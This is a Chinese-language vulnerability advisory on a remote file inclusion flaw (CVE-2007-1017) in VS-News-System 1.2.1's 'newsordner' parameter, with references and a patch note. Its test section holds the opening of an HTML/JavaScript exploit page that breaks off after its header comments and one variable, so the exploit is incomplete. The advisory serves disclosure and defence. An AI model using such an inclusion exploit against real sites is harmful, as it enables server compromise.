VS-News-System Show_News_Inc.PHP 远程文件包含漏洞
信息来源:ajann (ajannhwt@hotmail.com) 发表日期:2013-10-16 17:12:00
VS-News-System是网络管理工具。
VS-News-System 1.2.1没有正确验证show_news_inc.php及tpl/header.php内的"newsordner"参数值,及用于包含文件,可导致包含内部或外部资源内的任意文件。要利用此漏洞需要启用"register_globals"。
BUGTRAQ-ID:22592
CVE-ID:2007-1017
受影响系统:
VirtualSystem VS-News-System 1.2.1
测试方法:
警 告!以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>VS-News-System <= V1.2.1 (newsordner) Remote File Include Exploit</title> <script language="JavaScript"> //\'=============================================================================================== //\'[Script Name: VS-News-System <= V1.2.1 (newsordner) Remote File Include Exploit //\'[Coded by : ajann //\'[Author : ajann //\'[Contact : :( //\'[S.Page : http://www.virtualsystem.de/ //\'[$$ : Free //\'[Using : Write Target after Submit Click //\'=============================================================================================== //\'[[ERROR]]]------------------------------------------------------ //\'.... //\'.. //\'<? //\' //\'include ($gb_pfad ."/language/german.php"); //\' //\'?> //\'.... //\'.. //\'[[ERROR]]]--------------------------------------------------------- //# ajann,Turkey //# ... //Basic exploit,but any time : ( var path="/"
解决办法:安装厂商补丁
厂商补丁:
VirtualSystem
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.virtualsystem.de/downloads/index.php?mekat=PHP_Scripte&user_sort_top=&down_id=14&seite=0
参考:
MILW0RM:3322
URL:http://www.milw0rm.com/exploits/3322
BID:22592
URL:http://www.securityfocus.com/bid/22592
VUPEN:ADV-2007-0649
URL:http://www.vupen.com/english/advisories/2007/0649
OSVDB:33247
URL:http://osvdb.org/33247
SECUNIA:24220
URL:http://secunia.com/advisories/24220
XF:vsnewssystem-shownewsinc-file-include(32544)
URL:http://xforce.iss.net/xforce/xfdb/32544
参考信息:
http://secunia.com/advisories/24220